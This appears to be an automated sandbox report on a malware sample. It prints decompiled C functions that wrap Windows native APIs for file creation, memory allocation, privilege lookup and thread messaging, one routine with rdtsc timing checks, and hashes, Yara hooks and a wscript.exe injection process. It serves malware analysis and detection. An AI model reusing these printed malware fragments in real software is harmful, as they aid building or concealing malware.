C-Code - Quality: 100%

			E004185E0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E004191E0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}

0x004185ef
0x004185f7
0x0041862d
0x00418631

APIs

NtCreateFile.NTDLL(00000060,00408B13,?,00413BB7,00408B13,FFFFFFFF,?,?,FFFFFFFF,00408B13,00413BB7,?,00408B13,00000060,00000000,00000000), ref: 0041862D

Memory Dump Source

Source File: 00000003.00000002.411616931.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 36c6eae92b8005ba539885d914b12f5379157c135ee825ad128bd076db7cd32f
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: 24F0B2B2204208ABCB08CF89DC95EEB77ADAF8C754F158248FA0D97241C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004187C0, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004187C0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E004191E0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}

0x004187cf
0x004187d7
0x004187f9
0x004187fd

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193B4,?,00000000,?,00003000,00000040,00000000,00000000,00408B13), ref: 004187F9

Memory Dump Source

Source File: 00000003.00000002.411616931.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: 15e9253bdc6667238a85ff9da65bd6f3d3aad2e55959b4b07e7d113ae3ba9bea
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: 6CF015B2200209ABDB14DF89CC81EEB77ADAF88754F118149FE0897241C630F910CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00418710, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418710(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409763
				E004191E0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}

0x00418713
0x00418716
0x0041871f
0x00418727
0x00418735
0x00418739

APIs

NtClose.NTDLL(00413D50,?,?,00413D50,00408B13,FFFFFFFF), ref: 00418735

Memory Dump Source

Source File: 00000003.00000002.411616931.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: bce2094732f0dc6043ed148681cd5d29f2b757d64a263796670ac5fc8daf7d12
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: 27D01776200214BBE710EB99CC89EE77BACEF48760F154499FA189B242C930FA40C6E0

Uniqueness

Uniqueness Score: -1.00%

Function 004088D0, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E004088D0(void* __eax, void* __ebx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t28;
				void* _t35;
				void* _t37;
				void* _t38;
				void* _t44;
				void* _t58;
				intOrPtr _t60;
				void* _t63;
				void* _t65;
				void* _t66;
				void* _t67;

				asm("in al, dx");
				 *((intOrPtr*)(__ebx + 0x56)) =  *((intOrPtr*)(__ebx + 0x56)) + __edx;
				_t60 = _a4;
				_t44 = 0; // executed
				_t28 = E00406E20(_t60,  &_v24); // executed
				_t65 = _t63 + 9;
				if(_t28 != 0) {
					E00407030( &_v24,  &_v840);
					_t66 = _t65 + 8;
					do {
						E0041A0F0( &_v284, 0x104);
						E0041A760( &_v284,  &_v804);
						_t67 = _t66 + 0x10;
						_t58 = 0x4f;
						while(1) {
							_t35 = E00413DF0(E00413D90(_t60, _t58),  &_v284);
							_t67 = _t67 + 0x10;
							if(_t35 != 0) {
								break;
							}
							_t58 = _t58 + 1;
							if(_t58 <= 0x62) {
								continue;
							} else {
							}
							goto L9;
						}
						_t11 = _t60 + 0x14; // 0xffffe1a5
						 *(_t60 + 0x474) =  *(_t60 + 0x474) ^  *_t11;
						_t44 = 1;
						L9:
						_t37 = E00407060( &_v24,  &_v840);
						_t66 = _t67 + 8;
					} while (_t37 != 0 && _t44 == 0);
					_t38 = E004070E0(_t60,  &_v24); // executed
					if(_t44 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t38 - 0 + _t38;
						 *((intOrPtr*)(_t60 + 0x55c)) =  *((intOrPtr*)(_t60 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t60 + 0x31)) =  *((intOrPtr*)(_t60 + 0x31)) + _t44;
					_t22 = _t60 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t60 + 0x32)) =  *((intOrPtr*)(_t60 + 0x32)) +  *_t22 + 1;
					return 1;
				} else {
					return _t28;
				}
			}

0x004088d4
0x004088d8
0x004088db
0x004088e3
0x004088e5
0x004088ea
0x004088ef
0x00408902
0x00408907
0x00408910
0x0040891c
0x0040892f
0x00408934
0x00408937
0x00408940
0x00408952
0x00408957
0x0040895c
0x00000000
0x00000000
0x0040895e
0x00408962
0x00000000
0x00000000
0x00408964
0x00000000
0x00408962
0x00408966
0x00408969
0x0040896f
0x00408971
0x0040897c
0x00408981
0x00408984
0x00408991
0x0040899c
0x0040899e
0x004089a4
0x004089a8
0x004089ab
0x004089ab
0x004089b2
0x004089b5
0x004089ba
0x004089c7
0x004088f1
0x004088f6
0x004088f6

Memory Dump Source

Source File: 00000003.00000002.411616931.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25b9e4bfeadf490359593a5bd4afb5d1c4bb2ba5ede10faa6f148f0b6e30c1a6
Instruction ID: a66f789b9c9346c4209e30225a072a2b07741faaa143dbde407d40e20ce1c0b9
Opcode Fuzzy Hash: 25b9e4bfeadf490359593a5bd4afb5d1c4bb2ba5ede10faa6f148f0b6e30c1a6
Instruction Fuzzy Hash: BD21FBB2C4420957CB15E6649E42BFF737C9B54304F04057FE989A3181F639AB4987A7

Uniqueness

Uniqueness Score: -1.00%

Function 0040722D, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 67
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E0040722D(void* __ebx, void* __eflags, void* _a8, void* _a12) {
				void* _v63;
				void* _v64;

				asm("popfd");
				if (__eflags < 0) goto L6;
			}

0x0040722d
0x0040722f

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA

Strings

3333, xrefs: 0040723E

Memory Dump Source

Source File: 00000003.00000002.411616931.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID: 3333
API String ID: 1836367815-2924271548
Opcode ID: 54e0cd3aaf53947bfa66efa5826f2a7d4744240b8fe887549c77a2f125ae8093
Instruction ID: d501bd8cba93474a90a9ebdb936f779230d5c7ce2b2521dd484372b09d9871d5
Opcode Fuzzy Hash: 54e0cd3aaf53947bfa66efa5826f2a7d4744240b8fe887549c77a2f125ae8093
Instruction Fuzzy Hash: 3B11EC31A412197BD714AA959C42FFE775C5F41725F08406EFE04BA2C1D6AC7D0143EA

Uniqueness

Uniqueness Score: -1.00%

Function 004188B0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004188B0(intOrPtr _a4, char _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E004191E0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0x413536
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}

0x004188c7
0x004188d2
0x004188dd
0x004188e1

APIs

RtlAllocateHeap.NTDLL(65A,?,00413CAF,00413CAF,?,00413536,?,?,?,?,?,00000000,00408B13,?), ref: 004188DD

Strings

65A, xrefs: 004188D2, 004188DC

Memory Dump Source

Source File: 00000003.00000002.411616931.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID: 65A
API String ID: 1279760036-2085483392
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 6af236cfb772a66706e6e9b9d52e602bd21d3a4cd2a65313634d6b12f98b32f7
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: BDE012B1200208ABDB14EF99CC45EA777ACAF88654F118559FA085B242CA30F910CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 00418A41, Relevance: 1.6, APIs: 1, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E00418A41(void* __eax, void* __edi, WCHAR* _a4, WCHAR* _a8, struct _LUID* _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				int _v0;
				void* __esi;
				void* __ebp;
				void* _t21;
				intOrPtr* _t28;

				_t16 = __eax;
				asm("repne aaa");
				asm("lahf");
				if(__eax < 0x74) {
					_t1 = _t16 + 0xc88; // 0xd8c
					_t28 = _t1;
					E004191E0(__edi, __eax, _t28, _t21, 0, 0x39);
					return  *((intOrPtr*)( *_t28))(_a12, _a16, _a20, _a24, _a28, _a32);
				} else {
					asm("movsb");
					__ebp = __esp;
					__eax = _v0;
					__esi = _v0 + 0xc8c;
					__eax = _a8;
					__eax = LookupPrivilegeValueW(_a4, _a8, _a12); // executed
					__esi = __esi;
					return __eax;
				}
			}

0x00418a41
0x00418a46
0x00418a48
0x00418a49
0x00418a12
0x00418a12
0x00418a1a
0x00418a40
0x00418a4b
0x00418a4b
0x00418a51
0x00418a53
0x00418a62
0x00418a72
0x00418a80
0x00418a82
0x00418a84
0x00418a84

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFC2,0040CFC2,00000041,00000000,?,00408B85), ref: 00418A80

Memory Dump Source

Source File: 00000003.00000002.411616931.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: e3737d8042ac32eec8d9b6bfc5ac4ee7fb4eb1a13db9060813c8109c35138e59
Instruction ID: 655e4317e679ceb57a254f9e2164e691b698fca793e720379a65cade9ae70e82
Opcode Fuzzy Hash: e3737d8042ac32eec8d9b6bfc5ac4ee7fb4eb1a13db9060813c8109c35138e59
Instruction Fuzzy Hash: 8E0169B6200209BFDB10DF88CC84EEB37ADAF88340F118259FA0897241CA34E951CBB4

Uniqueness

Uniqueness Score: -1.00%

Function 00407280, Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00407280(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				int _t13;
				long _t20;
				int _t25;
				void* _t27;
				void* _t31;

				_t31 = __eflags;
				_v68 = 0;
				E0041A140( &_v67, 0, 0x3f);
				E0041AD20( &_v68, 3);
				_t12 = E00409B40(_t31, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00413E50(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t20 = _a8;
					_t13 = PostThreadMessageW(_t20, 0x111, 0, 0); // executed
					_t33 = _t13;
					if(_t13 == 0) {
						_t13 =  *_t25(_t20, 0x8003, _t27 + (E004092A0(_t33, 1, 8) & 0x000000ff) - 0x40, _t13);
					}
				}
				return _t13;
			}

0x00407280
0x0040728f
0x00407293
0x0040729e
0x004072ae
0x004072be
0x004072c3
0x004072ca
0x004072cd
0x004072da
0x004072dc
0x004072de
0x004072fb
0x004072fb
0x004072fd
0x00407302

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA

Memory Dump Source

Source File: 00000003.00000002.411616931.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
Instruction ID: 93bd109d16e53c8762968f959fe3c9c023db94cb098c15d1529cbaaabdda2f39
Opcode Fuzzy Hash: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
Instruction Fuzzy Hash: F001D431A8022977E720AA959C03FFE772C5B00B55F04006EFF04BA1C2E6A8790542EA

Uniqueness

Uniqueness Score: -1.00%

Function 004188F0, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004188F0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E004191E0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x004188ff
0x00418907
0x0041891d
0x00418921

APIs

RtlFreeHeap.NTDLL(00000060,00408B13,?,?,00408B13,00000060,00000000,00000000,?,?,00408B13,?,00000000), ref: 0041891D

Memory Dump Source

Source File: 00000003.00000002.411616931.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: 4eb6e808868848e44fc4af0a2d328e43ee2ba6839a30e24a5e1d9ea2c08b961d
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: 6BE012B1200209ABDB18EF99CC49EA777ACAF88750F018559FA085B242CA30E910CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 00418A50, Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418A50(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E004191E0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}

0x00418a6a
0x00418a80
0x00418a84

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFC2,0040CFC2,00000041,00000000,?,00408B85), ref: 00418A80

Memory Dump Source

Source File: 00000003.00000002.411616931.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: 6b795ac81b365ad13cf9f2a9b204a9737006b755962b409e964d21a2d06fa60d
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 62E01AB12002086BDB10DF49CC85EE737ADAF88650F018155FA0857241C934E950CBF5

Uniqueness

Uniqueness Score: -1.00%

Function 00418930, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418930(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E004191E0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}

0x00418933
0x0041894a
0x00418958

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418958

Memory Dump Source

Source File: 00000003.00000002.411616931.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: c6ffa8f41277cedcd146721b33de4ab2dd662f0a832426917f21051448e796de
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: 90D012716042147BD620DB99CC85FD7779CDF48790F018065FA1C5B241C531BA00C6E1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004162E1, Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.411616931.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 071520dd5ae6ac8471df09601d0f5da8133d2b72c7e56976e53ebbf8ffe3d1f7
Instruction ID: 3459cdfeab0f90d86afe6294167dcb1a69a5f26f9c69a3f70fc88ca844f2b17e
Opcode Fuzzy Hash: 071520dd5ae6ac8471df09601d0f5da8133d2b72c7e56976e53ebbf8ffe3d1f7
Instruction Fuzzy Hash: E8B0922BE080140A89146D497851070F370D587132E6133A7DE08A72086512C42A818E

Uniqueness

Uniqueness Score: -1.00%

Function 00415683, Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.411616931.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce422257c0f64362dd17525a9cfc04d040098944a30923a685de6631cdae45cf
Instruction ID: 451a305f5cc6780d3bc79067c4f94dc3ecb01278d9f17ede588c89f8e74f8e0f
Opcode Fuzzy Hash: ce422257c0f64362dd17525a9cfc04d040098944a30923a685de6631cdae45cf
Instruction Fuzzy Hash: D6B0926AB590041A5A208C08F8410B4F3A5D69727AF1233A3DE18A36014642C425169E

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: wscript.exe PID: 7088 Parent PID: 3440 wscript.exeCOMMON

Executed Functions

Function 00DD85DA, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,00DD3BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00DD3BB7,007A002E,00000000,00000060,00000000,00000000), ref: 00DD862D

Strings

.z`, xrefs: 00DD861D, 00DD8628

Memory Dump Source

Source File: 00000009.00000002.607143733.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 7501e8a3b97a43cbbc11b6db56e246e5bd6a7a9babf4f2bb8dba252d11c1acd3
Instruction ID: 398ddc4d34cb294540ff856008558788d07196b41afcf899589088e9b9419b27
Opcode Fuzzy Hash: 7501e8a3b97a43cbbc11b6db56e246e5bd6a7a9babf4f2bb8dba252d11c1acd3
Instruction Fuzzy Hash: 7901DDB2200109AFCB48CF88DC94EEB77A9EF8C354F158219FA09D7241C630E842CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00DD85E0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,00DD3BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00DD3BB7,007A002E,00000000,00000060,00000000,00000000), ref: 00DD862D

Strings

.z`, xrefs: 00DD861D, 00DD8628

Memory Dump Source

Source File: 00000009.00000002.607143733.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: 7e3a541673e97c54e457f7cd0efb74412fe96115e10fea20af55ee0f4aee8cc7
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: 20F0BDB2204208ABCB08CF88DC95EEB77ADAF8C754F158248FA0D97241C630E811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00DD8690, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(00DD3D72,5E972F65,FFFFFFFF,00DD3A31,?,?,00DD3D72,?,00DD3A31,FFFFFFFF,5E972F65,00DD3D72,?,00000000), ref: 00DD86D5

Memory Dump Source

Source File: 00000009.00000002.607143733.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: 44f07837d4f37d6267bed6a4da5b6cadd0fa099e2cd806e3d0901c290e7cdaee
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: 9CF0A4B2200209ABCB14DF89DC95EEB77ADEF8C754F158249BA1D97241D630E911CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00DD868C, Relevance: 1.5, APIs: 1, Instructions: 35filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(00DD3D72,5E972F65,FFFFFFFF,00DD3A31,?,?,00DD3D72,?,00DD3A31,FFFFFFFF,5E972F65,00DD3D72,?,00000000), ref: 00DD86D5

Memory Dump Source

Source File: 00000009.00000002.607143733.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 5d7e582f11799b5481c5aa3751e1ebdf0828ec7cc5ec047caa29013ba35f6bca
Instruction ID: 785ad6aa5d75cda96180b4225ab806ba69cc0cf7032466aa418e23b804de0c59
Opcode Fuzzy Hash: 5d7e582f11799b5481c5aa3751e1ebdf0828ec7cc5ec047caa29013ba35f6bca
Instruction Fuzzy Hash: 86F0B7B6200109AFCB14DF99DC94EEB77A9EF8C754F158249FA1DA7241C630ED11CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00DD87C0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00DC2D11,00002000,00003000,00000004), ref: 00DD87F9

Memory Dump Source

Source File: 00000009.00000002.607143733.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: 334495a6a51f71c451a3d03d313c51c7b718f9ff745dff6094dde760c2b04376
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: C8F015B2200209ABCB14DF89CC81EAB77ADEF88750F118149FE0897241C630F910CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00DD8710, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00DD3D50,?,?,00DD3D50,00000000,FFFFFFFF), ref: 00DD8735

Memory Dump Source

Source File: 00000009.00000002.607143733.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: f5cd82fb138ec94bde09cd8a9417249d901e46128596ed1b5058f35076311c6c
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: FED01776200314ABD710EBD8CC89EA7BBACEF48760F154499BA189B242C530FA00C6E0

Uniqueness

Uniqueness Score: -1.00%

Function 00DD868A, Relevance: 1.5, APIs: 1, Instructions: 15filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(00DD3D72,5E972F65,FFFFFFFF,00DD3A31,?,?,00DD3D72,?,00DD3A31,FFFFFFFF,5E972F65,00DD3D72,?,00000000), ref: 00DD86D5

Memory Dump Source

Source File: 00000009.00000002.607143733.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: af09249b2ba1b83d5dbcee046d93791224e04f67db4de04b6228446288ddba3e
Instruction ID: f8ab6fc570a8dd4973aae06553b832bc58064cc2f91a081fe0db3e1c8b27824c
Opcode Fuzzy Hash: af09249b2ba1b83d5dbcee046d93791224e04f67db4de04b6228446288ddba3e
Instruction Fuzzy Hash: 0DD0127A1041447FD704DFA5AC80CB7B7ACDFC8B20314854EF95D87100C531D9149770

Uniqueness

Uniqueness Score: -1.00%

Function 05269910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0526991A

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d76d6f757f9fb84b9e4f6b2111f719b776f7fc11c3d8746f671d64cffca184a5
Instruction ID: 5af53ffb564a3e76efd95fb714eec8104a14a2ed9c6a74f157d0e312b0597b67
Opcode Fuzzy Hash: d76d6f757f9fb84b9e4f6b2111f719b776f7fc11c3d8746f671d64cffca184a5
Instruction Fuzzy Hash: 609002B221100802E140B169444474600159FD0341F91C015A5055554EC6E98DD576A5

Uniqueness

Uniqueness Score: -1.00%

Function 05269540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0526954A

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 202109e44295749390d050501202419c81197a7a31ffaceb1505a1662eca28fa
Instruction ID: cce4bcad5e3421bbaa0c750da296dd1b63720289b03e775805518ed827861df6
Opcode Fuzzy Hash: 202109e44295749390d050501202419c81197a7a31ffaceb1505a1662eca28fa
Instruction Fuzzy Hash: EC900266221004031105E569074450700569FD5391391C025F1006550CD6B188616161

Uniqueness

Uniqueness Score: -1.00%

Function 052699A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 052699AA

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 89a42c6250ee52f40985d2203a2c6c6e8612722c3b3d1c525bf1c0b23ebce796
Instruction ID: fada394ab2770dc5174ec569112ea37a0b9a2bcb27d9ec0ee44e8a64e3d46784
Opcode Fuzzy Hash: 89a42c6250ee52f40985d2203a2c6c6e8612722c3b3d1c525bf1c0b23ebce796
Instruction Fuzzy Hash: F09002A235100842E100A1694454B060015DFE1341F91C019E1055554DC6A9CC527166

Uniqueness

Uniqueness Score: -1.00%

Function 052695D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 052695DA

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

